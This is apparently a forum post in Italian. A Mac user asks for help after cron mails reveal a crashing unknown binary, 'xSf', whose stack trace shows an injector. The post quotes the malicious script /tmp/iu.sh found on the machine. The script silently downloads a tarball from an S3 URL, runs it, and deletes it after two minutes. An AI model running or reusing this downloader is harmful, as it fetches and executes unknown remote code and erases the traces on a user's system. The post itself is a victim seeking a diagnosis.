Grazie alla funzione mail del Terminale mi è venuto in mente che c'era un qualche tipo di cron job in esecuzione con alcuni errori.
La mail del cron fornisce queste informazioni:
2018-08-02 23:47:22.698 xSf[717:27543] *** Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '*** -[_NSPlaceholderData initWithBase64EncodedString:options:]: nil string argument'
*** First throw call stack:
(
0 CoreFoundation 0x00007fff57d622db __exceptionPreprocess + 171
1 libobjc.A.dylib 0x00007fff7eeffc76 objc_exception_throw + 48
2 CoreFoundation 0x00007fff57df3d7d +[NSException raise:format:] + 205
3 Foundation 0x00007fff59e028ee -[NSData(NSData) initWithBase64EncodedString:options:] + 84
4 xSf 0x000000010b54fd19 INJECTOR_decryptData_RNCryptor + 121
5 xSf 0x000000010b55010a -[l196gKNh f27WaC8u:path:] + 410
6 xSf 0x000000010b54ff2e -[l196gKNh s7PJWuXO:] + 158
7 xSf 0x000000010b552cd1 main + 225
8 libdyld.dylib 0x00007fff7fb19015 start + 1
)
libc++abi.dylib: terminating with uncaught exception of type NSException
/tmp/iu.sh: line 6: 717 Abort trap: 6 ./xSf
Sembra che questo sia stato eseguito da alcuni script situati in: ~/Library/sandastros.np/sandastros.np
di cui non riesco a leggere o decifrare il contenuto.
Ho controllato lo script che si trova in /tmp/iu.sh
che contiene quanto segue:
#!/bin/bash
/usr/bin/curl -s -L -o /var/tmp/xSf.tgz "https://s3.amazonaws.com/xsfer/xSf.tgz"
mkdir -p /var/tmp/xSf
tar -xzf /var/tmp/xSf.tgz -C /var/tmp/xSf/
cd /var/tmp/xSf/
./xSf
func_cccc(){
sleep 120
rm -rf /var/tmp/xSf
rm -rf /var/tmp/xSf.tgz
}
func_cccc &
Questo URL è raggiungibile ma non volevo scaricare e aprire il file tar.
Le autorizzazioni della cartella /tmp
sono impostate correttamente, anche se iu.sh
ha il mio utente come proprietario, quindi sembra consentire l'installazione di qualsiasi cosa possa averle fornito le autorizzazioni.
Qualche indizio su cosa sia questo?